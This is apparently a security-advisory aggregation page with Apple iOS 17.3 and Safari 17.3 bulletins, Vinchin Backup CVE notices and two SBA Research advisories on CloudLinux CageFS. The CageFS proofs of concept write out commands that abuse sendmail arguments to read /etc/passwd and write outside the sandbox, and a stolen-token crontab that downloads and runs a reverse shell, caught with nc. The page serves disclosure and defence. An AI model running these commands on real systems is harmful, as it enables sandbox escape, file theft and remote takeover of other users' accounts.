Apple Security Advisory 01-22-2024-2 - iOS 17.3 and iPadOS 17.3 addresses bypass and code execution vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-01-22-2024-2 iOS 17.3 and iPadOS 17.3iOS 17.3 and iPadOS 17.3 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT214059.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.Apple Neural EngineAvailable for devices with Apple Neural Engine: iPhone XS and later,iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1stgeneration and later, iPad Air 3rd generation and later, iPad 8thgeneration and later, and iPad mini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2024-23212: Ye Zhang of Baidu SecurityCoreCryptoAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An attacker may be able to decrypt legacy RSA PKCS#1 v1.5ciphertexts without having the private keyDescription: A timing side-channel issue was addressed with improvementsto constant-time computation in cryptographic functions.CVE-2024-23218: Clemens LangKernelAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: The issue was addressed with improved memory handling.CVE-2024-23208: fmyy(@binary_fmyy) and lime From TIANGONG Team ofLegendsec at QI-ANXIN GroupMail SearchAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to access sensitive user dataDescription: This issue was addressed with improved redaction ofsensitive information.CVE-2024-23207: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab), andIan de MarcellusNSSpellCheckerAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to access sensitive user dataDescription: A privacy issue was addressed with improved handling offiles.CVE-2024-23223: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)Reset ServicesAvailable for: iPhone XS and laterImpact: Stolen Device Protection may be unexpectedly disabledDescription: The issue was addressed with improved authentication.CVE-2024-23219: Peter Watthey and Christian ScaleseSafariAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A user's private browsing activity may be visible in SettingsDescription: A privacy issue was addressed with improved handling ofuser preferences.CVE-2024-23211: Mark BowersShortcutsAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A shortcut may be able to use sensitive data with certainactions without prompting the userDescription: The issue was addressed with additional permissions checks.CVE-2024-23203: an anonymous researcherCVE-2024-23204: Jubaer Alnazi (@h33tjubaer)ShortcutsAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to bypass certain Privacy preferencesDescription: A privacy issue was addressed with improved handling oftemporary files.CVE-2024-23217: Kirin (@Pwnrin)TCCAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to access user-sensitive dataDescription: An issue was addressed with improved handling of temporaryfiles.CVE-2024-23215: Zhongquan Li (@Guluisacat)Time ZoneAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to view a user's phone number in system logsDescription: This issue was addressed with improved redaction ofsensitive information.CVE-2024-23210: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)WebKitAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: A maliciously crafted webpage may be able to fingerprint theuserDescription: An access issue was addressed with improved accessrestrictions.WebKit Bugzilla: 262699CVE-2024-23206: an anonymous researcherWebKitAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing web content may lead to arbitrary code executionDescription: The issue was addressed with improved memory handling.WebKit Bugzilla: 266619CVE-2024-23213: Wangtaiyu of Zhongfu infoWebKitAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing maliciously crafted web content may lead to arbitrarycode executionDescription: Multiple memory corruption issues were addressed withimproved memory handling.WebKit Bugzilla: 265129CVE-2024-23214: Nan Wang (@eternalsakura13) of 360 VulnerabilityResearch InstituteWebKitAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: Processing maliciously crafted web content may lead to arbitrarycode execution. Apple is aware of a report that this issue may have beenexploited.Description: A type confusion issue was addressed with improved checks.WebKit Bugzilla: 267134CVE-2024-23222This update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 17.3 and iPadOS 17.3".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDP8ACgkQX+5d1TXaIvp1NA//Ziu4pKJd/OIbEjiPfVw8w/q2A4uPkHzOtxWWeSsuQHmUjULi9PGLtjFdOy6SGjIAXKkP5wpt2qoOXcqEwP8kQzMQZwmRSHyPbSNXLyDiThgLdFWOqV5GcO1+eM7vOvKfcf7ITJJashPS4gJet7QpqX0vM5Pop9XJlS679IdhnauCY/ocmoWafvayY7IZf6SXYXh/V6wWk76zW7ZAgdWz0qxPjoObc3UrggJagBuBGzbSbEj1aK+tw8GMKw0whSG1fMqoLWsIielGaAahHmyIrg424S3HK/JdAXU8QXKKUc3HYVyShceLIgf7Gn/RFtIFiqoAlublgbEXthPYVG+pwFMvjUiCFPZK4tQ9yDtst+6ViPT+LK8Ea21ZqwvWTYqcFzKVbc+DcA4W0sLZE9Rc3tMXm60qoy5x1T4tIOFGSotrjH0M8CthxaxSMxRusr4ejiczr5dbeq/4pjU5PevU/kZVIp0lA65WkznSqio/UxpJ9uD2Oh2C8ZKOHE/az3I3zD7Tll52RPWA201fvo9Q3bCL5JRd/ayXN+tVRuyACkLPcDgPMNB8TdjoBrzFvJ8KRg9XHn9qJSsz/h15UJ/lwVOKBHmSP3H+VWBR/ts0oKcj+UQGmNSHtWNXvreC6ZbQi16JSK2wp0MvVWbFrWnwg0Ory4e5x5hHbrBEvvw0Qwk==kOJs-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-2

Vinchin Backup and Recovery versions 7.2 and below suffer from a command injection vulnerability in SystemHandler.class.php.

    CVE ID: CVE-2024-22903Title: Command Injection Vulnerability in SystemHandler.class.php of Vinchin Backup & Recovery Versions 7.2 and EarlierDescription:A significant security vulnerability, CVE-2024-22903, has been identified in the `deleteUpdateAPK` function within the `SystemHandler.class.php` file of Vinchin Backup & Recovery software, affecting versions 7.2 and earlier. This function, designed to delete APK files, is prone to a command injection vulnerability due to improper handling of input parameters.Function Analysis:- The function extracts `md5` and `file_name` parameters from user input.- It includes a check for an empty `file_name`, but lacks adequate validation or sanitization for the input used in constructing system commands.- The command to delete the specified APK file, built using the `file_name` parameter, is executed via the `exec` function, leading to a security vulnerability.Exploitation Risk:Attackers can exploit this flaw by inserting malicious commands in the `file_name` parameter. When this parameter is processed by the vulnerable function, the injected commands are executed on the server, presenting a severe risk of unauthorized access or control.Current Status:As of the latest information, there is no known patch available for this vulnerability in versions 7.2 and earlier of Vinchin Backup & Recovery.Recommendation:Users are urged to be vigilant and to monitor Vinchin for any security updates. Until a patch is released, implementing additional security controls and closely monitoring system activity is crucial for mitigating the risk posed by this vulnerability.Signed,Valentin Lobstein

Vinchin Backup And Recovery 7.2 SystemHandler.class.php Command Injection

Vinchin Backup and Recovery version 7.2 has been identified as being configured with default root credentials, posing a significant security vulnerability.

CVE ID: CVE-2024-22902

Title: Default Root Credentials Vulnerability in Vinchin Backup & Recovery v7.2

Suggested Description:  
Vinchin Backup & Recovery version 7.2 has been identified as being configured with default root credentials, posing a significant security vulnerability.

Additional Information:  
There is no documentation or guidance from Vinchin on changing the root password for this version. The use of password authentication as root is possible, leading to potential unauthorized access.

Vulnerability Type:  
Incorrect Access Control

Vendor of Product:  
Vinchin

Affected Product Code Base:  
Vinchin - Version 7.2

Attack Type:  
Remote

Impact - Escalation of Privileges:  
True

Attack Vectors:  
This security flaw can be exploited through both local and remote access using the default root credentials provided in the software.

Discoverer:  
Valentin Lobstein

References:  
- http://vinchin.com

Conclusion:  
The existence of default root credentials in Vinchin Backup & Recovery v7.2 (CVE-2024-22902) is a serious security oversight. Users of this software version should be aware of the risks and stay alert for any updates or security patches from Vinchin. Immediate action should be taken to change these credentials to prevent unauthorized access.

Signed,Valentin Lobstein

Vinchin Backup And Recovery 7.2 Default Root Credentials

A critical security issue has been discovered in Vinchin Backup and Recovery version 7.2. The software has been found to use default MYSQL credentials, which could lead to significant security risks.

    CVE ID: CVE-2024-22901Title: Default MYSQL Credentials Vulnerability in Vinchin Backup & Recovery v7.2Description:A critical security issue, identified as CVE-2024-22901, has been discovered in Vinchin Backup & Recovery version 7.2. The software has been found to use default MYSQL credentials, which could lead to significant security risks.Additional Information:Vinchin has not addressed previous disclosures, including CVE-2022-35866, and has not patched the reported vulnerabilities. The presence of these unresolved issues, now compounded by the newly discovered vulnerability of default MYSQL credentials, opens up potential avenues for easy unauthenticated Remote Code Execution (RCE). This lack of response is alarming for a product that is certified in cybersecurity and poses a considerable risk to its users.Vulnerability Type:Incorrect Access ControlVendor of Product:VinchinAffected Product Code Base:Vinchin Backup & Recovery - Version 7.2Affected Component:The MySQL database used by Vinchin Backup & RecoveryAttack Type:RemoteImpact - Escalation of Privileges:TrueAttack Vectors:The vulnerability can be exploited via local or remote access, utilizing the unpatched default MySQL credentials.Discoverer:Valentin LobsteinReference:http://vinchin.comConclusion:The discovery of CVE-2024-22901 highlights a critical oversight in Vinchin Backup & Recovery's security posture. Users are advised to be cautious and to monitor for any updates or patches from Vinchin, which should be applied immediately to mitigate this risk.Signed,Valentin Lobstein

Vinchin Backup And Recovery 7.2 Default MySQL Credentials

Vinchin Backup and Recovery versions 7.2 and below suffer from a command injection vulnerability in the syncNtpTime function.

    CVE ID: CVE-2024-22899Title: Command Injection Vulnerability in Vinchin Backup and Recovery's syncNtpTime Function in Versions 7.2 and EarlierDescription:A critical security vulnerability, identified as CVE-2024-22899, has been discovered in the `syncNtpTime` function of Vinchin Backup and Recovery software. This issue affects versions 7.2 and earlier. The function, part of the `SystemHandler.class.php` file, is designed for synchronizing system time with NTP servers but is prone to a command injection vulnerability due to improper handling of user input.Function Analysis:- The function is responsible for handling the `ntphost` parameter, which is expected to contain the address of the NTP server.- The vulnerability stems from the direct concatenation of this parameter into a system command line, without adequate validation or sanitization.- This design flaw allows an attacker to inject arbitrary commands into the `ntphost` parameter, which are then executed by the system.Current Status:As of now, there is no patch available for this vulnerability in versions 7.2 and earlier of Vinchin Backup and Recovery. Users of these versions are at risk of exploitation.Recommendation:It is advised for users of Vinchin Backup and Recovery versions 7.2 and earlier to remain alert and monitor for updates from Vinchin. Once a patch becomes available, it should be applied immediately to mitigate the risk posed by this vulnerability.Conclusion:The discovery of CVE-2024-22899 underscores the importance of rigorous input validation and sanitization in software development. This vulnerability poses a severe security risk, potentially leading to unauthorized system access or control.Signed,Valentin Lobstein

Vinchin Backup And Recovery 7.2 syncNtpTime Command Injection

Apple Security Advisory 01-22-2024-1 - Safari 17.3 addresses code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-01-22-2024-1 Safari 17.3

Safari 17.3 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214056.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Safari  
Available for: macOS Monterey and macOS Ventura  
Impact: A user's private browsing activity may be visible in Settings  
Description: A privacy issue was addressed with improved handling of  
user preferences.  
CVE-2024-23211: Mark Bowers

WebKit  
Available for: macOS Monterey and macOS Ventura  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An access issue was addressed with improved access  
restrictions.  
WebKit Bugzilla: 262699  
CVE-2024-23206: an anonymous researcher

WebKit  
Available for: macOS Monterey and macOS Ventura  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 266619  
CVE-2024-23213: Wangtaiyu of Zhongfu info

WebKit  
Available for: macOS Monterey and macOS Ventura  
Impact: Processing maliciously crafted web content may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
exploited.  
Description: A type confusion issue was addressed with improved checks.  
WebKit Bugzilla: 267134  
CVE-2024-23222

Safari 17.3 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmWvDK4ACgkQX+5d1TXa  
IvpsdQ/+LRXsqQK9ZIXoBoXhj0w15DUKVrVfQr/jauI3pgxBZcuZeYiM0SyNnROH  
SXppIL9KGUaOxDm+RqggN4rVB/PFPBTfZ7NB42odpnyxswVe7ozTir09BaYGnwoo  
o+S2I8IN6Nn7ePV5wTXjmftUjNetk6J5iGQ4KboVPTPsNOuw+3r/nohjrYt2ERgq  
YFVAsBK0gOQwY1chnNxOqFghWtZCkYKIinYCc89KcYVwZ6WpFaQlqk++E1p1vd1C  
l4teK1uJv7thLkpneq9e3alb1qQCfX5XLpHX596uNrs0HXJYESQgwZgHmMqsssJa  
LOCTahxE39Oevjy9q5z+UzaIBK2SAULgmaMdnrRLDV8641hDsjVuYyCzVs5jMNOa  
+ty80EmEUiwcR/yuzbAmOgmdvuVuowdkGWR9pdhTWM9Co7PMdTRZLUiOsi4qUUPT  
HxqJ42o53gNWzJhINTyufVRDd2VTcOH8X+C/uEbwMF/LHO4scNnI/0n1SrRsUCKg  
msV7r3VheTGylX3KV/ivZiJq8agjheh/awRDQ1/1Lyd7yGb8tZSdP0iFrCgayB9d  
RgrVR7yyXd/SCQsjI2hGRzTMoTQhARsx78dXtf2LFxONZZOFIaYnupzLxHeX58kp  
lcN/OmgEb9w0t+/M9Lwn4kdvTZ/rbfF5+1BAI9VTuuAt9N+0fyk=  
=jmbL  
-----END PGP SIGNATURE-----

Apple Security Advisory 01-22-2024-1

CloudLinux CageFS versions 7.0.8-2 and below insufficiently restrict file paths supplied to the sendmail proxy command. This allows local users to read and write arbitrary files of certain file formats outside the CageFS environment.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

# CloudLinux CageFS Insufficiently Restricted Proxy Command #

Link: https://github.com/sbaresearch/advisories/tree/public/2020/SBA-ADV-20200707-02_CloudLinux_CageFS_Insufficiently_Restricted_Proxy_Commands

## Vulnerability Overview ##

CloudLinux CageFS 7.0.8-2 or below insufficiently restricts file paths  
supplied to the `sendmail` proxy command. This allows local users to read  
and write arbitrary files of certain file formats outside the CageFS  
environment.

* **Identifier**            : SBA-ADV-20200707-02  
* **Type of Vulnerability** : External Control of File Name or Path  
* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)  
* **Vendor**                : CloudLinux Inc.  
* **Affected Versions**     : <= 7.0.8-2  
* **Fixed in Version**      : 7.1.1-1  
* **CVE ID**                : CVE-2020-36772  
* **CVSS Vector**           : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L  
* **CVSS Base Score**       : 6.6 (Medium)

## Vendor Description ##

> CloudLinux OS is the leading platform for multitenancy. It improves  
> server stability, density, and security by isolating each tenant and  
> giving them allocated server resources. This creates an environment  
> that feels more like a virtual server than a shared hosting account.  
> By doing so, CloudLinux OS reduces operating costs and churn rates,  
> and increases profitability.

Source: <https://www.cloudlinux.com/>

## Impact ##

A CageFS-restricted local user can read and write arbitrary files of certain  
file formats outside the CageFS environment by exploiting the vulnerability  
documented in this advisory.

## Vulnerability Description ##

CloudLinux offers a feature called proxy commands in CageFS environments.  
It allows limited execution of commands outside the CageFS environment from  
a user restricted within the CageFS environment.

CageFS allows in its default configuration to execute `sendmail` as a proxy  
command outside the CageFS environment. This default configuration is  
designed to allow local programs sending emails by invoking `sendmail`.  
Due to the insufficient validation of sendmail's arguments an attacker can  
invoke other sendmail functionality as well. While CageFS applies some  
restrictions to the allowed arguments it does not restrict or validate the  
`-bi` and `-oA` arguments.

Therefore, an attacker can have `sendmail` access arbitrary files which will  
be interpreted as alias database files by enabling the `newalias` mode of  
`sendmail` with `-bi` and specifying a file located outside the CageFS  
environment with `-oA`.

On systems using the Postfix to Sendmail compatibility interface, a great  
number of different alias database types can be used to craft exploits.  
The compatibility interface internally calls `postalias` and besides the  
`-oA` argument already being dangerous by itself, it also suffers from an  
argument injection issue, which allows injection of additional Postfix  
specific arguments for `postalias`. However, this is not a security issue  
in Postfix.

According to Postfix developers, Postfix's `sendmail` does not enforce a  
security policy on command-line arguments. Instead, it relies on the  
UNIX/Linux system to enforce access policies based on the effective user and  
group IDs of the process. If a security policy should be enforced, the  
calling process must sanitize the command-line arguments before they are  
given to `sendmail`. This includes but is not limited to sanity checks on  
pathnames, and if applicable sanity checks on file contents in a way that  
is not vulnerable to time-of-check to time-of-use race attacks, and  
disabling options processing with `--`.

## Proof of Concept ##

For example, an attacker can read arbitrary files that at least partially  
follow the structure `key <whitespace> value` via the lookup table type  
`texthash`:

```sh  
$ sendmail -bi -oA'-s,-f,texthash:/etc/passwd'  
postalias: warning: /etc/passwd, line 1: expected format: key whitespace value -- ignoring this line  
[...]  
postalias: warning: /etc/passwd, line 211: expected format: key whitespace value -- ignoring this line  
sssd:x:496:493:User:    for sssd:/:/sbin/nologin  
dbus:x:81:81:System:    message bus:/:/sbin/nologin  
polkitd:x:497:495:User: for polkitd:/:/sbin/nologin  
tss:x:59:59:Account:    used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin  
systemd-resolve:x:193:193:systemd:      Resolver:/:/sbin/nologin  
rngd:x:494:491:Random:  Number Generator Daemon:/var/lib/rngd:/sbin/nologin  
sshd:x:74:74:Privilege-separated:       SSH:/var/empty/sshd:/sbin/nologin  
systemd-coredump:x:499:497:systemd:     Core Dumper:/:/sbin/nologin  
nobody:x:65534:65534:Kernel:    Overflow User:/:/sbin/nologin  
ftp:x:14:50:FTP:        User:/var/ftp:/sbin/nologin  
unbound:x:498:496:Unbound:      DNS resolver:/etc/unbound:/sbin/nologin  
nrpe:x:492:486:NRPE:    user for the NRPE service:/var/run/nrpe:/sbin/nologin  
```

The attacker can also use other lookup table types which might disclose  
sensitive information. For example, `unix` allows the query of specific  
users regardless of the format:

```sh  
$ sendmail -bi -oA'-q,ftp2406151,unix:passwd.byname'  
ftp2406151:x:935:935::/home/ftp2406151:/sbin/nologin  
```

An attacker can also write specific file formats outside the CageFS  
environment. For example, with the `hash` lookup table type:

```sh  
$ echo sba:was_here | sendmail -bi -oA'-o,-p,-i,-f,hash:/tmp/sba_was_here'  
$ sendmail -bi -oA'-s,-f,hash:/tmp/sba_was_here'  
@:      @  
YP_LAST_MODIFIED:       1594138203  
YP_MASTER_NAME: localhost  
sba:    was_here  
```

## Recommended Countermeasures ##

We recommend to restrict the `sendmail` command to only strictly required  
parameters using an allow list approach. At least the following parameters  
are known to cause dangerous behavior:

* `-oA`: Allows specification of multiple paths and additional arguments.  
  It is important to consider that it is directly followed by the pathname  
  without a separator, i.e., `-oA/etc/passwd`.  
* `-bi`: Enables the `newalias` mode of `sendmail`.  
* `-I`: Enables the `newalias` mode of `sendmail`.  
* `-v`: If the parameter is added at least two times, i.e., `-vv`,  
  `-vvvvv` or `-v -v`, it enables the verbose mode, which leaks the  
  Postfix configuration in some cases.

We did not fully analyze other parameters of `sendmail`, therefore, it is  
possible that `sendmail` as proxy command is also prone to other attacks.

## Timeline ##

* `2020-07-07`: identification of vulnerability in version 7.0.6-1  
* `2020-07-10`: initial vendor contact  
* `2020-07-13`: initial vendor response  
* `2020-07-13`: disclosed vulnerability to vendor security contact  
* `2020-08-06`: vendor released version 7.1.1-1 to testing  
* `2020-09-03`: vendor released version 7.1.1-1 to production  
* `2020-10-02`: request CVE from MITRE  
* `2022-01-04`: MITRE declined request as it falls in the scope of Red Hat  
* `2024-01-19`: request CVE from Red Hat  
* `2024-01-22`: Red Hat assigned CVE-2020-36772  
* `2024-01-25`: public disclosure

## References ##

* CageFS 7.1.1-1 beta: <https://blog.cloudlinux.com/beta-cagefs-and-alt-python27-cllib-updated-1>  
* CageFS 7.1.1-1 production: <https://blog.cloudlinux.com/lve-manager-lve-stats-lve-utils-and-alt-python27-cllib-have-been-rolled-out-to-100>

## Credits ##

* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmWyn0kACgkQ+7iGL1j3  
dbL5PhAAspmKHEa29DXuwNjJ/3l96fX2AiuPj5NDhoSF01tfakpNE0w86c8GiGvw  
GRhGQ0n1AO9qNcfyULjWjtQ8FwFuRPzPI0mfaycW2oDQ3BAG2LtFqmQvpUzTV6tP  
pckL2H50ptablRYlphFEY0XDt42ezU3wjokNK/cpRhZlzCs7mvd6LuCg5qXwBno/  
srsxlb4n1IdZRF5mh7ariYpObDvLUctwhri7RCBEqb6MZh+y6rSSPKsGdCHq/su2  
6KEH0mxNPwMJtccNah29SWvv+fZ9+mkK1IuuWIdhyM2XMTJxOE4n0AsoISVGI6bH  
9XgL0AQ3B3kyoqHbfCyoUonbz4mSdTFInqpuqlU0X6Wos+kjnS/27sH/De8ba+mm  
jmDDQFmoe1QrVkbDjXI7zBy81Qh3nVZ/qig/1SCex0i+IyO4HpdCYbjrs7I76C0V  
fvpd0VWb3BKpGHA4IhISA/jmCSlvxW+2gkHrhxfWhM1K3Pa/a0qH9RuCFAZ7B9qP  
OQM3Yrhbikqyaqh/ZI7nYMc33KfiPCiXKejDtaTGIVVThKHr1mQibgaYt+ILi0RH  
8uxH+tpuVqjEgVHZQMBQEAa3WvaGYo2kJJxU0z+3m/s6W45JhGguMzrH/n9z6XKo  
H4xyTp1YQ3aP6gZBgoMEkipkc0B+QK/zb+xOghfE3Cbjdx47gCo=  
=E60q  
-----END PGP SIGNATURE-----

CloudLinux CageFS 7.0.8-2 Insufficiently Restricted Proxy Command

CloudLinux CageFS versions 7.1.1-1 and below pass the authentication token as a command line argument. In some configurations this allows local users to view the authentication token via the process list and gain code execution as another user.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

# CloudLinux CageFS Token Disclosure #

Link: https://github.com/sbaresearch/advisories/tree/public/2020/SBA-ADV-20200707-01_CloudLinux_CageFS_Token_Disclosure

## Vulnerability Overview ##

CloudLinux CageFS 7.1.1-1 or below passes the authentication token as a  
command line argument. In some configurations this allows local users to  
view the authentication token via the process list and gain code execution  
as another user.

* **Identifier**            : SBA-ADV-20200707-01  
* **Type of Vulnerability** : Invocation of Process Using Visible Sensitive Information  
* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)  
* **Vendor**                : CloudLinux Inc.  
* **Affected Versions**     : <= 7.1.1-1  
* **Fixed in Version**      : 7.1.2-2  
* **CVE ID**                : CVE-2020-36771  
* **CVSS Vector**           : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  
* **CVSS Base Score**       : 7.8 (High)

## Vendor Description ##

> CloudLinux OS is the leading platform for multitenancy. It improves  
> server stability, density, and security by isolating each tenant and  
> giving them allocated server resources. This creates an environment  
> that feels more like a virtual server than a shared hosting account.  
> By doing so, CloudLinux OS reduces operating costs and churn rates,  
> and increases profitability.

Source: <https://www.cloudlinux.com/>

## Impact ##

If the `lve_namespaces` service or the virtualized proc filesystem  
feature is disabled, a local user can obtain the CageFS authentication  
token of other users by exploiting the vulnerability documented in this  
advisory. In most configurations this allows attackers to gain code  
execution as those users.

## Vulnerability Description ##

CloudLinux offers a feature called proxy commands in CageFS environments.  
It allows limited execution of commands outside the CageFS environment from  
a user restricted within the CageFS envinronment.

For this purpose a CageFS daemon runs outside of the CageFS environment,  
it is accessible via a UNIX socket from within the CageFS environment.  
The UNIX socket is handled by `proxyexec`. To make the whole process of  
calling a tool outside of the CageFS transparent to the user, wrapper  
scripts are placed within CageFS, which in turn call `proxyexec` for  
execution of the commands outside of the CageFS environment.

Those wrapper scripts read the CageFS token from `/var/.cagefs/.cagefs.token`  
and pass it to the `proxyexec` command as a command line argument.

CloudLinux by default enables the virtualized proc filesystem, which  
prevents other users from seeing the CageFS token within the process  
list. However, if the `lve_namespaces` service is disabled, e.g. the  
systemd unit is masked out, or the virtualized proc filesystem is  
explicitly disabled, other users can see the CageFS token within the  
process list. They can use the CageFS token of other users to talk to  
the CageFS daemon via `proxyexec` and the CageFS daemon executes the  
commands with the privileges of the supplied authentication token.

## Proof of Concept ##

Let's assume, the `lve_namespaces` service is disabled and we are user  
`ftp2406151`:

```sh  
$ id  
uid=935(ftp2406151) gid=935(site2406151) groups=935(site2406151)  
```

We list the process list and find another user executing `ping example.org`:

```sh  
$ ps aux | grep proxyexec  
 2094 root      0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server  
1180646 934       0:00 /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / PING 1180642 example.org  
1180647 root      0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server  
1181229 ftp24061  0:00 grep proxyexec  
```

We now can execute commands as user `ftp1488781` and, for example, view  
the crontab:

```sh  
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0  
no crontab for ftp1488781  
```

Now we setup a new crontab entry, which downloads a reverse shell and  
executes it every minute:

```sh  
$ echo '* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell &' | /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_SAVE 0  
```

```sh  
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0  
* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell &  
```

Our shell connects back to us and we can execute arbitrary commands as  
the other user:

```sh  
$ nc -l -p 1234  
id  
uid=934(ftp1488781) gid=934(site1488781) groups=934(site1488781)  
```

## Recommended Countermeasures ##

We recommend to avoid passing sensitive information as a command line  
argument. Instead, `proxyexec` should directly read the CageFS token  
from the file `/var/.cagefs/.cagefs.token` and pass it to the CageFS  
daemon via the UNIX socket.

## Timeline ##

* `2020-07-07`: identification of vulnerability in version 7.0.6-1  
* `2020-07-10`: initial vendor contact  
* `2020-07-13`: initial vendor response  
* `2020-07-13`: disclosed vulnerability to vendor security contact  
* `2020-09-02`: vendor released version 7.1.2-2 to testing  
* `2020-09-28`: vendor released version 7.1.2-2 to production  
* `2020-10-02`: request CVE from MITRE  
* `2022-01-04`: MITRE declined request as it falls in the scope of Red Hat  
* `2024-01-19`: request CVE from Red Hat  
* `2024-01-22`: Red Hat assigned CVE-2020-36771  
* `2024-01-25`: public disclosure

## References ##

